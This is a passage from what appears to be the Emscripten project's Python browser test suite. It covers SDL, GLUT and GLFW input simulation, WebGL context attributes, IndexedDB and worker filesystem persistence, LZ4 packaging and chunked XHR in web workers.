var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
def test(args):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + args)
# test normally
test([])
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
test(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
